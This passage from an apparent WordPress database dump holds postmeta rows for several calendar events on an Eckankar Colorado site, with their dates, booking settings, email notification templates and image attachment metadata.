\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(187894,268794,'mec_tickets','a:0:{}'),(187895,268794,'mec_fees_global_inheritance','1'),(187896,268794,'mec_fees','a:0:{}'),(187897,268794,'mec_ticket_variations_global_inheritance','1'),(187898,268794,'mec_ticket_variations','a:0:{}'),(187899,268794,'mec_reg_fields_global_inheritance','1'),(187900,268794,'mec_reg_fields','a:0:{}'),(187901,268794,'mec_bfixed_fields','a:0:{}'),(187902,268794,'mec_op','a:0:{}'),(187903,268794,'mec_fields','a:0:{}'),(187904,268794,'mec_event_status','EventScheduled'),(187905,268794,'mec_moved_online_link',''),(187906,268794,'mec_cancelled_reason',''),(187907,268794,'mec_display_cancellation_reason_in_single_page',''),(187908,268794,'boldgrid_hide_page_title','0'),(187909,268794,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(187910,268794,'passster_activate_global_protection',NULL),(187911,268794,'passster_activate_protection',NULL),(187912,268794,'passster_protection_type','password'),(187913,268794,'boldgrid_in_page_containers','1'),(187927,268794,'_dp_original','267696'),(187915,268794,'passster_area_shortcode',''),(187916,268794,'_wp_old_date','2023-01-14'),(187917,268794,'mec_cost_auto_calculate','0'),(187918,268794,'mec_style_per_event','global'),(187919,268794,'mec_trailer_url',''),(187920,268794,'mec_trailer_title',''),(187921,268794,'mec_start_datetime','2023-09-16 01:00 PM'),(187922,268794,'mec_end_datetime','2023-09-16 02:00 PM'),(187923,268794,'mec_sequence','14'),(187924,268794,'mec_event_gallery','a:0:{}'),(187925,268794,'mec_related_events','a:0:{}'),(187926,268794,'mec_banner','a:0:{}'),(187928,268794,'_edit_lock','1689357381:2'),(187929,268794,'_edit_last','2'),(187930,268794,'_thumbnail_id','266105'),(187931,268797,'protect_children',''),(187932,268797,'mec_color',''),(187933,268797,'mec_location_id','131'),(187934,268797,'mec_dont_show_map','0'),(187935,268797,'mec_organizer_id','1'),(187936,268797,'mec_read_more',''),(187937,268797,'mec_more_info',''),(187938,268797,'mec_more_info_title',''),(187939,268797,'mec_more_info_target','_self'),(187940,268797,'mec_cost',''),(187941,268797,'mec_currency','a:0:{}'),(187942,268797,'mec_additional_organizer_ids','a:0:{}'),(187943,268797,'mec_additional_location_ids','a:0:{}'),(187944,268797,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-08-13\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-08-13\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(187945,268797,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(187946,268797,'mec_certain_weekdays','a:0:{}'),(187947,268797,'mec_allday','0'),(187948,268797,'one_occurrence','0'),(187949,268797,'mec_hide_time','0'),(187950,268797,'mec_hide_end_time','0'),(187951,268797,'mec_comment',''),(187952,268797,'mec_timezone','global'),(187953,268797,'mec_countdown_method','global'),(187954,268797,'mec_public','1'),(187955,268797,'mec_start_date','2023-08-13'),(187956,268797,'mec_start_time_hour','1'),(187957,268797,'mec_start_time_minutes','0'),(187958,268797,'mec_start_time_ampm','PM'),(187959,268797,'mec_start_day_seconds','46800'),(187960,268797,'mec_end_date','2023-08-13'),(187961,268797,'mec_end_time_hour','2'),(187962,268797,'mec_end_time_minutes','30'),(187963,268797,'mec_end_time_ampm','PM'),(187964,268797,'mec_end_day_seconds','52200'),(187965,268797,'mec_repeat_status','0'),(187966,268797,'mec_repeat_type',''),(187967,268797,'mec_repeat_interval','1'),(187968,268797,'mec_repeat_end',''),(187969,268797,'mec_repeat_end_at_occurrences',''),(187970,268797,'mec_repeat_end_at_date',''),(187971,268797,'mec_advanced_days','a:0:{}'),(187972,268797,'mec_in_days',''),(187973,268797,'mec_not_in_days',''),(187974,268797,'mec_hourly_schedules','a:0:{}'),(187975,268797,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(187976,268797,'mec_tickets','a:0:{}'),(187977,268797,'mec_fees_global_inheritance','1'),(187978,268797,'mec_fees','a:0:{}'),(187979,268797,'mec_ticket_variations_global_inheritance','1'),(187980,268797,'mec_ticket_variations','a:0:{}'),(187981,268797,'mec_reg_fields_global_inheritance','1'),(187982,268797,'mec_reg_fields','a:0:{}'),(187983,268797,'mec_bfixed_fields','a:0:{}'),(187984,268797,'mec_op','a:0:{}'),(187985,268797,'mec_fields','a:0:{}'),(187986,268797,'mec_event_status','EventScheduled'),(187987,268797,'mec_moved_online_link',''),(187988,268797,'mec_cancelled_reason',''),(187989,268797,'mec_display_cancellation_reason_in_single_page',''),(187990,268797,'boldgrid_hide_page_title','0'),(187991,268797,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(187992,268797,'passster_activate_global_protection',NULL),(187993,268797,'passster_activate_protection',NULL),(187994,268797,'passster_protection_type','password'),(187995,268797,'boldgrid_in_page_containers','1'),(187996,268797,'passster_area_shortcode',''),(187997,268797,'_wp_old_date','2023-01-14'),(187998,268797,'mec_cost_auto_calculate','0'),(187999,268797,'mec_style_per_event','global'),(188000,268797,'mec_trailer_url',''),(188001,268797,'mec_trailer_title',''),(188002,268797,'mec_start_datetime','2023-08-13 01:00 PM'),(188003,268797,'mec_end_datetime','2023-08-13 02:30 PM'),(188004,268797,'mec_sequence','1'),(188005,268797,'mec_event_gallery','a:0:{}'),(188006,268797,'mec_related_events','a:0:{}'),(188007,268797,'mec_banner','a:0:{}'),(188008,268797,'_thumbnail_id','268798'),(188010,268797,'_dp_original','268765'),(188011,268797,'_edit_lock','1691156297:15'),(188012,268797,'_edit_last','15'),(188013,268798,'_wp_attached_file','2023/07/StairwaytoGod.webp'),(188014,268798,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:26:\"2023/07/StairwaytoGod.webp\";s:8:\"filesize\";i:20966;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"StairwaytoGod-348x196.webp\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6318;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"StairwaytoGod-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3568;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:26:\"StairwaytoGod-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9508;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:26:\"StairwaytoGod-500x338.webp\";s:5:\"width\";i:500;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:15402;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:26:\"StairwaytoGod-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12200;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:26:\"StairwaytoGod-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9030;}s:8:\"tileview\";a:5:{s:4:\"file\";s:26:\"StairwaytoGod-300x338.webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13110;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(188317,268838,'passster_area_shortcode',''),(188318,268838,'_wp_old_date','2023-01-14'),(188319,268838,'mec_cost_auto_calculate','0'),(188320,268838,'mec_style_per_event','global'),(188321,268838,'mec_trailer_url',''),(188322,268838,'mec_trailer_title',''),(188323,268838,'mec_start_datetime','2023-08-23 01:00 PM'),(188324,268838,'mec_end_datetime','2023-08-23 02:30 PM'),(188325,268838,'mec_sequence','22'),(188326,268838,'mec_event_gallery','a:0:{}'),(188327,268838,'mec_related_events','a:0:{}'),(188328,268838,'mec_banner','a:0:{}'),(188329,268838,'_thumbnail_id','268836'),(188331,268838,'_dp_original','268837'),(188332,268838,'_edit_lock','1691169742:2'),(188333,268838,'_edit_last','2'),(188334,268839,'protect_children',''),(188335,268839,'mec_color',''),(188336,268839,'mec_location_id','185'),(188337,268839,'mec_dont_show_map','0'),(188338,268839,'mec_organizer_id','1'),(188339,268839,'mec_read_more',''),(188340,268839,'mec_more_info',''),(188341,268839,'mec_more_info_title',''),(188342,268839,'mec_more_info_target','_self'),(188343,268839,'mec_cost',''),(188344,268839,'mec_currency','a:0:{}'),(188345,268839,'mec_additional_organizer_ids','a:0:{}'),(188346,268839,'mec_additional_location_ids','a:0:{}'),(188347,268839,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-08-09\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-08-09\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(188348,268839,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(188349,268839,'mec_certain_weekdays','a:0:{}'),(188350,268839,'mec_allday','0'),(188351,268839,'one_occurrence','0'),(188352,268839,'mec_hide_time','0'),(188353,268839,'mec_hide_end_time','0'),(188354,268839,'mec_comment',''),(188355,268839,'mec_timezone','global'),(188356,268839,'mec_countdown_method','global'),(188357,268839,'mec_public','1'),(188358,268839,'mec_start_date','2023-08-09'),(188359,268839,'mec_start_time_hour','10'),(188360,268839,'mec_start_time_minutes','30'),(188361,268839,'mec_start_time_ampm','AM'),(188362,268839,'mec_start_day_seconds','37800'),(188363,268839,'mec_end_date','2023-08-09'),(188364,268839,'mec_end_time_hour','11'),(188365,268839,'mec_end_time_minutes','30'),(188366,268839,'mec_end_time_ampm','AM'),(188367,268839,'mec_end_day_seconds','41400'),(188368,268839,'mec_repeat_status','0'),(188369,268839,'mec_repeat_type',''),(188370,268839,'mec_repeat_interval','1'),(188371,268839,'mec_repeat_end',''),(188372,268839,'mec_repeat_end_at_occurrences',''),(188373,268839,'mec_repeat_end_at_date',''),(188374,268839,'mec_advanced_days','a:0:{}'),(188375,268839,'mec_in_days',''),(188376,268839,'mec_not_in_days',''),(188377,268839,'mec_hourly_schedules','a:0:{}'),(188378,268839,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(188379,268839,'mec_tickets','a:0:{}'),(188380,268839,'mec_fees_global_inheritance','1'),(188381,268839,'mec_fees','a:0:{}'),(188382,268839,'mec_ticket_variations_global_inheritance','1'),(188383,268839,'mec_ticket_variations','a:0:{}'),(188384,268839,'mec_reg_fields_global_inheritance','1'),(188385,268839,'mec_reg_fields','a:0:{}'),(188386,268839,'mec_bfixed_fields','a:0:{}'),(188387,268839,'mec_op','a:0:{}'),(188388,268839,'mec_fields','a:0:{}'),(188389,268839,'mec_event_status','EventScheduled'),(188390,268839,'mec_moved_online_link',''),(188391,268839,'mec_cancelled_reason',''),(188392,268839,'mec_display_cancellation_reason_in_single_page',''),(188393,268839,'boldgrid_hide_page_title','0'),(188394,268839,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(188395,268839,'passster_activate_global_protection',NULL),(188396,268839,'passster_activate_protection',NULL),(188397,268839,'passster_protection_type','password'),(188398,268839,'boldgrid_in_page_containers','1'),(188412,268839,'_dp_original','267696'),(188400,268839,'passster_area_shortcode',''),(188401,268839,'_wp_old_date','2023-01-14'),(188402,268839,'mec_cost_auto_calculate','0'),(188403,268839,'mec_style_per_event','global'),(188404,268839,'mec_trailer_url',''),(188405,268839,'mec_trailer_title',''),(188406,268839,'mec_start_datetime','2023-08-09 10:30 AM'),(188407,268839,'mec_end_datetime','2023-08-09 11:30 AM'),(188408,268839,'mec_sequence','8'),(188409,268839,'mec_event_gallery','a:0:{}'),(188410,268839,'mec_related_events','a:0:{}'),(188411,268839,'mec_banner','a:0:{}'),(188413,268839,'_edit_lock','1690648171:2'),(188414,268839,'_edit_last','2'),(188415,268840,'_wp_attached_file','2023/07/looking-at-light-3.jpg'),(188416,268840,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:798;s:6:\"height\";i:449;s:4:\"file\";s:30:\"2023/07/looking-at-light-3.jpg\";s:8:\"filesize\";i:126892;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"looking-at-light-3-348x196.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23143;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"looking-at-light-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8087;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:30:\"looking-at-light-3-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95485;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:30:\"looking-at-light-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28254;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:30:\"looking-at-light-3-500x449.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:449;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71001;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:30:\"looking-at-light-3-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47741;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:30:\"looking-at-light-3-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32688;}s:8:\"tileview\";a:5:{s:4:\"file\";s:30:\"looking-at-light-3-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34396;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(188417,268839,'_thumbnail_id','268840'),(188418,268840,'original-file','2023/07/looking-at-light-3-updraft-pre-smush-original.jpg'),(188419,268840,'smush-complete','1'),(188420,268840,'smush-info','The file was compressed from 123.92 KB to 119.08 KB saving 3.91 percent using WP-Optimize'),(188421,268840,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:126892;s:12:\"smushed-size\";i:121936;s:15:\"savings-percent\";d:3.910000000000000142108547152020037174224853515625;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:126892;s:10:\"compressed\";i:121936;}s:6:\"medium\";a:2:{s:8:\"original\";i:23143;s:10:\"compressed\";i:22740;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8087;s:10:\"compressed\";i:8087;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:95485;s:10:\"compressed\";i:93668;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:28254;s:10:\"compressed\";i:27820;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:71001;s:10:\"compressed\";i:69479;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:47741;s:10:\"compressed\";i:46801;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:32688;s:10:\"compressed\";i:32085;}s:8:\"tileview\";a:2:{s:8:\"original\";i:34396;s:10:\"compressed\";i:33904;}}}'),(188422,268843,'mec_color',''),(188423,268843,'mec_location_id','185'),(188424,268843,'mec_dont_show_map','0'),(188425,268843,'mec_organizer_id','1'),(188426,268843,'mec_read_more',''),(188427,268843,'mec_more_info',''),(188428,268843,'mec_more_info_title',''),(188429,268843,'mec_more_info_target','_self'),(188430,268843,'mec_cost',''),(188431,268843,'mec_currency','a:0:{}'),(188432,268843,'mec_additional_organizer_ids','a:0:{}'),(188433,268843,'mec_additional_location_ids','a:0:{}'),(188434,268843,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-08-13\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-08-13\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(188435,268843,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(188436,268843,'mec_certain_weekdays','a:0:{}'),(188437,268843,'mec_allday','0'),(188438,268843,'one_occurrence','0'),(188439,268843,'mec_hide_time','0'),(188440,268843,'mec_hide_end_time','0'),(188441,268843,'mec_comment',''),(188442,268843,'mec_timezone','global'),(188443,268843,'mec_countdown_method','global'),(188444,268843,'mec_public','1'),(188445,268843,'mec_start_date','2023-08-13'),(188446,268843,'mec_start_time_hour','10'),(188447,268843,'mec_start_time_minutes','30'),(188448,268843,'mec_start_time_ampm','AM'),(188449,268843,'mec_start_day_seconds','37800'),(188450,268843,'mec_end_date','2023-08-13'),(188451,268843,'mec_end_time_hour','11'),(188452,268843,'mec_end_time_minutes','30'),(188453,268843,'mec_end_time_ampm','AM'),(188454,268843,'mec_end_day_seconds','41400'),(188455,268843,'mec_repeat_status','0'),(188456,268843,'mec_repeat_type',''),(188457,268843,'mec_repeat_interval','1'),(188458,268843,'mec_repeat_end',''),(188459,268843,'mec_repeat_end_at_occurrences',''),(188460,268843,'mec_repeat_end_at_date',''),(188461,268843,'mec_advanced_days','a:0:{}'),(188462,268843,'mec_in_days',''),(188463,268843,'mec_not_in_days',''),(188464,268843,'mec_hourly_schedules','a:0:{}'),(188465,268843,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(188466,268843,'mec_tickets','a:0:{}'),(188467,268843,'mec_fees_global_inheritance','1'),(188468,268843,'mec_fees','a:0:{}'),(188469,268843,'mec_ticket_variations_global_inheritance','1'),(188470,268843,'mec_ticket_variations','a:0:{}'),(188471,268843,'mec_reg_fields_global_inheritance','1'),(188472,268843,'mec_reg_fields','a:0:{}'),(188473,268843,'mec_bfixed_fields','a:0:{}'),(188474,268843,'mec_op','a:0:{}'),(188475,268843,'mec_fields','a:0:{}'),(188476,268843,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration 